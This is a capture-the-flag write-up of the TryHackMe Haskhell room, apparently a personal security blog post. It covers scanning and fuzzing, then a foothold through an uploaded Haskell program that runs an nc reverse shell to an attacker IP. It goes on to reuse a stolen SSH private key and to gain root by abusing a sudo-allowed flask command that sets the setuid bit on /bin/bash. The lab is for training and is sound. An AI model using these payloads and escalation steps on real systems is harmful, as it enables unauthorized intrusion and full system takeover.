Post

TryHackMe Writeup - Haskshell

Posted
Preview Image
By sk3l10x1ng
3 min read

THM - https://tryhackme.com/room/haskhell

Enumeration :

Port scanning

As always, we start by scanning the target machine’s open ports:

1
2
3

┌──(root㉿kali)-[~/Desktop/thm/hakshell]
└─# rustscan -a $ip --range 1-65535 -- -A -sCV -oA $ip  -O

Results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 60 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 1d:f3:53:f7:6d:5b:a1:d4:84:51:0d:dd:66:40:4d:90 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD6azVu3Hr+20SblWk0j7SeT8U3VySD4u18ChyDYyOoZiza2PTe1qsuwnw06/kboHaLejqPmnxkMDWgEeXoW0L11q2D8mfSf8EVvk++7bNqQ0mlkjdcknOs11mdYqSOkM1yw06LolltKtjlf/FpT706QFkRKQO30fT4YgKY6GD71aYdafhTBgZlXA51pGyruDUOP+lqhVPvLZJnI/oOTWkv5kT0a3T+FGRZfEi+GBrhvxP7R7n3QFRSBDPKSBRYLVdlSYXPD83P1pND6F/r3BvyfHw4UY0yKbw+ntvhiRcUI2FYyN5Vj1Jrb6ipCnp5+UcFdmROOHSgWS5Qzzx5fPZB
|   256 26:7c:bd:33:8f:bf:09:ac:9e:e3:d3:0a:c3:34:bc:14 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMx1lBsNtSWJvxM159Ahr110Jpf3M/dVqblDAoVXd8QSIEYIxEgeqTdbS4HaHPYnFyO1j8s6fQuUemJClGw3Bh8=
|   256 d5:fb:55:a0:fd:e8:e1:ab:9e:46:af:b8:71:90:00:26 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICPmznEBphODSYkIjIjOA+0dmQPxltUfnnCTjaYbc39R
5001/tcp open  http    syn-ack ttl 60 Gunicorn 19.7.1
|_http-title: Homepage
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET
|_http-server-header: gunicorn/19.7.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Sony X75CH-series Android TV (Android 5.0) (92%), Linux 2.6.32 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%), QNAP QTS 4.0 - 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).

Web Enumeration

From the result from nmap scan , there is web_server running on port 5001.

Untitled

Initiated Fuzzing on the web_server, found a hidden directory called /submit .

1
2

┌──(root㉿kali)-[~/Desktop/thm/hakshell/web_fuzz]
└─# ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u <http://$ip:5001/FUZZ> -ic -v -e .php,.html,.txt -o fuzz -of all

Results :

1
2
3

[Status: 200, Size: 237, Words: 48, Lines: 9, Duration: 1090ms]
| URL | <http://10.10.185.37:5001/submit>
    * FUZZ: submit

Up on visiting the endpoint /submit , there is a file upload function for submtting the assignments

Foothold

From the information from the home page of the web_page , they are learning haskell programming languae and need to submit their assignment on haskell and upload the haskell program.

Upload a malicious below haskell code to file rev.hs , to receive revese shell from the machine

1
2
3
4
5

module Main where

import System.Process

main = callCommand "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 10.17.4.74 443 >/tmp/f"

Start a listener on the attacker machine

1
2

──(root㉿kali)-[~/Desktop/thm/hakshell]
└─# pwncat-cs -lp 44

Now upload the reverse shell haskell file and click on upload

Untitled

Upon clicking upload , we receive a reverse shell as a flask service account user

Untitled

Lateral Movement

Under the home directory of the user name prof contains ssh private key.

Untitled

 

Copy the private key to the attacker machine and save it to file name id_rsa.prof and change the permission of the file.

1
2

┌──(root㉿kali)-[~/Desktop/thm/hakshell/ssh]
└─#chmod 600 id_rsa.prof

 

Run the following ssh command and we login into ssh as user prof.

1
2

┌──(root㉿kali)-[~/Desktop/thm/hakshell/ssh]
└─# ssh prof@$ip -i id_rsa.prof

Untitled

Privilege Escalation

By running the sudo -ll , we can run the /usr/bin/flask run as root user ,due to misconfiguraton of sudo.

Untitled

 

Copy the below python script to file name called server.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

from flask import Flask
import subprocess

app = Flask(__name__)

@app.route("/")

def hello():
    cmd = ["chmod","+s","/bin/bash"]
    p = subprocess.Popen(cmd, stdout = subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            stdin=subprocess.PIPE)
    out,err = p.communicate()
    return out
if __name__ == "__main__" :
    app.run()

 

Export the environment varible as below

1

prof@haskhell:~$ export FLASK_APP=server.py

 

Now run the sudo as root user to run the command /usr/bin/flask run

1

prof@haskhell:~$ sudo -u root /usr/bin/flask run &

 

Do curl request on the localhost ,in which flask server is listening on port 5000

1

prof@haskhell:~$ curl http://127.0.0.1:5000/

Untitled

 

When we list out the the binary , we have a setuid bit is set on the /bin/bash binary. Run the below command to get user as root

1

prof@haskhell:~$ /bin/bash -p

Untitled

 

The simplest way to achieve root shell .

Copy the below python script to file name called server.py

1
2
3

import os

os.system("/bin/bash")

Execute the following commands

1
2
3

prof@haskhell:~$ export FLASK_APP=server.py
prof@haskhell:~$
prof@haskhell:~$ sudo -u root /usr/bin/flask run

Untitled

Tryhackme, Linux, easy
file_upload haskell flask(sudo_misconfig) easy
This post is licensed under CC BY 4.0 by the author.